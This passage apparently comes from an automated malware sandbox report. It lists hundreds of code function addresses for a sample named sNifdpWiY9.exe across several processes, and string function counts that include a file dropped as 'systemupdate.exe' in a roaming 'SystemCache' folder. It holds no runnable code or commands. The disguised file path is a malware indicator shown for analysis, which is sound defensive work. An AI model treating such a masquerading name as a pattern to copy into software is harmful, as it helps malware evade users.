      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8ECF0A12_2_00007FF75F8ECF0A
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8D3F0012_2_00007FF75F8D3F00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F9EFD12_2_00007FF75F8F9EFD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8DDE2012_2_00007FF75F8DDE20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8D7E8012_2_00007FF75F8D7E80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F905E0012_2_00007FF75F905E00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8E8CD012_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F2CDF12_2_00007FF75F8F2CDF
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F914C7012_2_00007FF75F914C70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F916B9012_2_00007FF75F916B90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F909AD012_2_00007FF75F909AD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8E2AF012_2_00007FF75F8E2AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F9AF012_2_00007FF75F8F9AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F904AE012_2_00007FF75F904AE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8E3A2012_2_00007FF75F8E3A20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8C1A9012_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F6A9012_2_00007FF75F8F6A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F984A0012_2_00007FF75F984A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F913A1012_2_00007FF75F913A10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8D892012_2_00007FF75F8D8920
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8C684012_2_00007FF75F8C6840
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9D186812_2_00007FF75F9D1868
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9037D012_2_00007FF75F9037D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8DD72012_2_00007FF75F8DD720
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F91279012_2_00007FF75F912790
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9D178812_2_00007FF75F9D1788
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9D176012_2_00007FF75F9D1760
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8D96C012_2_00007FF75F8D96C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9D170012_2_00007FF75F9D1700
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9D16F812_2_00007FF75F9D16F8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8BD71012_2_00007FF75F8BD710
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F90A62012_2_00007FF75F90A620
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8EB64012_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F267012_2_00007FF75F8F2670
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8FE53012_2_00007FF75F8FE530
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8D154012_2_00007FF75F8D1540
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8C158012_2_00007FF75F8C1580
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9024B012_2_00007FF75F9024B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8FB4CD12_2_00007FF75F8FB4CD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9114B012_2_00007FF75F9114B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8C54E012_2_00007FF75F8C54E0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8EC41812_2_00007FF75F8EC418
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F146012_2_00007FF75F8F1460
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8EA48012_2_00007FF75F8EA480
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9083D012_2_00007FF75F9083D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8C824012_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F9101F012_2_00007FF75F9101F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F94D18012_2_00007FF75F94D180
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F90116012_2_00007FF75F901160
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F90B19012_2_00007FF75F90B190
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8F418112_2_00007FF75F8F4181
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8B50C016_2_00007FF75F8B50C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8CF0C016_2_00007FF75F8CF0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8FB0C016_2_00007FF75F8FB0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9510F016_2_00007FF75F9510F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F805016_2_00007FF75F8F8050
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F008016_2_00007FF75F8F0080
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8FEFD016_2_00007FF75F8FEFD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F908F2016_2_00007FF75F908F20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8C9F9016_2_00007FF75F8C9F90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F94EEE016_2_00007FF75F94EEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8ECF0A16_2_00007FF75F8ECF0A
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8D3F0016_2_00007FF75F8D3F00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F9EFD16_2_00007FF75F8F9EFD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8DDE2016_2_00007FF75F8DDE20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8D7E8016_2_00007FF75F8D7E80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F905E0016_2_00007FF75F905E00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8E8CD016_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F2CDF16_2_00007FF75F8F2CDF
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F914C7016_2_00007FF75F914C70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F916B9016_2_00007FF75F916B90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F909AD016_2_00007FF75F909AD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8E2AF016_2_00007FF75F8E2AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F9AF016_2_00007FF75F8F9AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F904AE016_2_00007FF75F904AE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8E3A2016_2_00007FF75F8E3A20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8C1A9016_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F6A9016_2_00007FF75F8F6A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F984A0016_2_00007FF75F984A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F913A1016_2_00007FF75F913A10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8D892016_2_00007FF75F8D8920
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8C684016_2_00007FF75F8C6840
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9D186816_2_00007FF75F9D1868
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9037D016_2_00007FF75F9037D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8DD72016_2_00007FF75F8DD720
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F91279016_2_00007FF75F912790
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9D178816_2_00007FF75F9D1788
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9D176016_2_00007FF75F9D1760
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8D96C016_2_00007FF75F8D96C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9D170016_2_00007FF75F9D1700
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9D16F816_2_00007FF75F9D16F8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8BD71016_2_00007FF75F8BD710
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F90A62016_2_00007FF75F90A620
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8EB64016_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F267016_2_00007FF75F8F2670
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8FE53016_2_00007FF75F8FE530
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8D154016_2_00007FF75F8D1540
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8C158016_2_00007FF75F8C1580
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9024B016_2_00007FF75F9024B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8FB4CD16_2_00007FF75F8FB4CD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9114B016_2_00007FF75F9114B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8C54E016_2_00007FF75F8C54E0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8EC41816_2_00007FF75F8EC418
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F146016_2_00007FF75F8F1460
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8EA48016_2_00007FF75F8EA480
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9083D016_2_00007FF75F9083D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8C824016_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9101F016_2_00007FF75F9101F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F94D18016_2_00007FF75F94D180
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F90116016_2_00007FF75F901160
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F90B19016_2_00007FF75F90B190
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8F418116_2_00007FF75F8F4181
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8B50C019_2_00007FF75F8B50C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8CF0C019_2_00007FF75F8CF0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8FB0C019_2_00007FF75F8FB0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9510F019_2_00007FF75F9510F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F805019_2_00007FF75F8F8050
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F008019_2_00007FF75F8F0080
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8FEFD019_2_00007FF75F8FEFD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F908F2019_2_00007FF75F908F20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8C9F9019_2_00007FF75F8C9F90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F94EEE019_2_00007FF75F94EEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8ECF0A19_2_00007FF75F8ECF0A
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8D3F0019_2_00007FF75F8D3F00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F9EFD19_2_00007FF75F8F9EFD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8DDE2019_2_00007FF75F8DDE20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8D7E8019_2_00007FF75F8D7E80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F905E0019_2_00007FF75F905E00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8E8CD019_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F2CDF19_2_00007FF75F8F2CDF
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F914C7019_2_00007FF75F914C70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F916B9019_2_00007FF75F916B90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F909AD019_2_00007FF75F909AD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8E2AF019_2_00007FF75F8E2AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F9AF019_2_00007FF75F8F9AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F904AE019_2_00007FF75F904AE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8E3A2019_2_00007FF75F8E3A20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8C1A9019_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F6A9019_2_00007FF75F8F6A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F984A0019_2_00007FF75F984A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F913A1019_2_00007FF75F913A10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8D892019_2_00007FF75F8D8920
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8C684019_2_00007FF75F8C6840
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9D186819_2_00007FF75F9D1868
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9037D019_2_00007FF75F9037D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8DD72019_2_00007FF75F8DD720
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F91279019_2_00007FF75F912790
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9D178819_2_00007FF75F9D1788
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9D176019_2_00007FF75F9D1760
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8D96C019_2_00007FF75F8D96C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9D170019_2_00007FF75F9D1700
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9D16F819_2_00007FF75F9D16F8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8BD71019_2_00007FF75F8BD710
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F90A62019_2_00007FF75F90A620
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8EB64019_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F267019_2_00007FF75F8F2670
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8FE53019_2_00007FF75F8FE530
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8D154019_2_00007FF75F8D1540
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8C158019_2_00007FF75F8C1580
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9024B019_2_00007FF75F9024B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8FB4CD19_2_00007FF75F8FB4CD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9114B019_2_00007FF75F9114B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8C54E019_2_00007FF75F8C54E0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8EC41819_2_00007FF75F8EC418
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F146019_2_00007FF75F8F1460
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8EA48019_2_00007FF75F8EA480
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9083D019_2_00007FF75F9083D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8C824019_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F9101F019_2_00007FF75F9101F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F94D18019_2_00007FF75F94D180
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F90116019_2_00007FF75F901160
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F90B19019_2_00007FF75F90B190
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8F418119_2_00007FF75F8F4181
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8B50C022_2_00007FF75F8B50C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8CF0C022_2_00007FF75F8CF0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8FB0C022_2_00007FF75F8FB0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9510F022_2_00007FF75F9510F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F805022_2_00007FF75F8F8050
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F008022_2_00007FF75F8F0080
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8FEFD022_2_00007FF75F8FEFD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F908F2022_2_00007FF75F908F20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8C9F9022_2_00007FF75F8C9F90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F94EEE022_2_00007FF75F94EEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8ECF0A22_2_00007FF75F8ECF0A
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8D3F0022_2_00007FF75F8D3F00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F9EFD22_2_00007FF75F8F9EFD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8DDE2022_2_00007FF75F8DDE20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8D7E8022_2_00007FF75F8D7E80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F905E0022_2_00007FF75F905E00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8E8CD022_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F2CDF22_2_00007FF75F8F2CDF
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F914C7022_2_00007FF75F914C70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F916B9022_2_00007FF75F916B90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F909AD022_2_00007FF75F909AD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8E2AF022_2_00007FF75F8E2AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F9AF022_2_00007FF75F8F9AF0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F904AE022_2_00007FF75F904AE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8E3A2022_2_00007FF75F8E3A20
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8C1A9022_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F6A9022_2_00007FF75F8F6A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F984A0022_2_00007FF75F984A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F913A1022_2_00007FF75F913A10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8D892022_2_00007FF75F8D8920
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8C684022_2_00007FF75F8C6840
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9D186822_2_00007FF75F9D1868
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9037D022_2_00007FF75F9037D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8DD72022_2_00007FF75F8DD720
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F91279022_2_00007FF75F912790
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9D178822_2_00007FF75F9D1788
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9D176022_2_00007FF75F9D1760
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8D96C022_2_00007FF75F8D96C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9D170022_2_00007FF75F9D1700
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9D16F822_2_00007FF75F9D16F8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8BD71022_2_00007FF75F8BD710
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F90A62022_2_00007FF75F90A620
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8EB64022_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F267022_2_00007FF75F8F2670
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8FE53022_2_00007FF75F8FE530
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8D154022_2_00007FF75F8D1540
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8C158022_2_00007FF75F8C1580
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9024B022_2_00007FF75F9024B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8FB4CD22_2_00007FF75F8FB4CD
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9114B022_2_00007FF75F9114B0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8C54E022_2_00007FF75F8C54E0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8EC41822_2_00007FF75F8EC418
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F146022_2_00007FF75F8F1460
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8EA48022_2_00007FF75F8EA480
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9083D022_2_00007FF75F9083D0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8C824022_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9101F022_2_00007FF75F9101F0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F94D18022_2_00007FF75F94D180
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F90116022_2_00007FF75F901160
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F90B19022_2_00007FF75F90B190
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8F418122_2_00007FF75F8F4181
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: String function: 000001DE4A3F65C0 appears 33 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F9980C0 appears 480 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F9567E0 appears 50 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F8BFCF0 appears 170 times
